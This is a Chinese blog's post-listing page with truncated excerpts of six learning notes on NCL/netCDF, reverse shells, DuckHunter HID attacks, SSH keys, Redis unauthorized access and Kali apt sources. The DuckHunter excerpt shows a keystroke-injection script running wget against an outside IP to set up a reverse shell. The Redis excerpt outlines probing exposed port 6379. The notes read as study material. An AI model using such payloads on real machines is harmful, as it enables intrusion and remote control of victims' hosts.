- 博客(6)
- 收藏
- 关注
RSS订阅原创 ncl基础
netCDF 格式 读取 ncdump file_name | less ncdump -h file_name | less == ncl_filedump ncdump -v ncl ncl_filedump parts of netCDF dimension size lat=fixed lon=fixed time=12(有unlimited) file attributes varia...
2018-12-19 22:29:28
1750
原创 反弹Shell攻击
反弹Shell攻击 什么是 一般的正向攻击:攻击服务器链接目标(e.g. 远程桌面、ssh、web服务、telnet…) 反弹:受害者主机主动链接攻击服务器 为什么 正向攻击不能实现 目标在局域网内 目标ip动态变化 目标防火墙:只能发出请求,不能接受 病毒木马等 不清楚对方开机和网络情况 怎么做 让目标服务器下载bash到主机 让目标运行bash bash 让服务器连接至攻击主机 ...
2018-11-18 15:37:55
1523
转载 第一章
功能 — 利用 例:手机——usb——电脑 NetHunter 操作系统 DuckHunter HID 工具 CONTROL SPACE STRING iterm ENTER ENTER STRING ifconfig ENTER 原理:模拟键盘操作 反弹Shell攻击 CONTROL SPACE STRING iterm ENTER ENTER STRING wget http://45.32...
2018-11-06 14:37:14
206
原创 服务器免密登录-秘钥验证
2 是否有公钥0 生成0 生成0 拷贝4 公钥加密的随机数1 请求3 公钥加密的随机数5 私钥解密的随机数6 验证解密结果7 解密结果正确 允许登录服务器公钥客户端私钥 客户端生成私钥和公钥,并把公钥拷贝给服务器端; 客户端发起登录请求,发送自己的相关信息; 服务器端根据客户端发来的信息查找是否存有该客户端的公钥,若没有拒绝登录,若有则生成一段随机数使用该公钥加密后发送给客户端; 客户端收到服务...
2018-11-05 20:31:30
350
原创 Redis未授权访问漏洞
http://www.cnblogs.com/xiaozi/p/7568272.html 测试 条件: 开启Redis服务 Redis服务以Root启动 服务绑定0.0.0.0(外网可以访问) 存在未授权问题(弱密码) 防范: 修改默认端口 设置强密码 限制外网访问 操作: 查找Redis服务器 - 6379端口(组件指纹) python脚本访问目标 socket ip 6379 非返回...
2018-10-06 21:48:33
145
原创 Linux基础-apt-搜狗输入法
添加source list 位置 leafpad /etc/apt/source.list 源 #阿里云kali源 deb http://mirrors.aliyun.com/kali sana main non-free contrib deb-src http://mirrors.aliyun.com/kali sana main non-free contrib deb http://mi...
2018-10-06 21:35:13
903
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人